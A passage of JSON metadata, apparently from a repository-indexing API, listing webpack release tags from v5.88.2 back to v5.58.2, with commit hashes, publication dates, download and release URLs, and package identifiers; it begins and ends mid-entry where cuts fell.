repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T0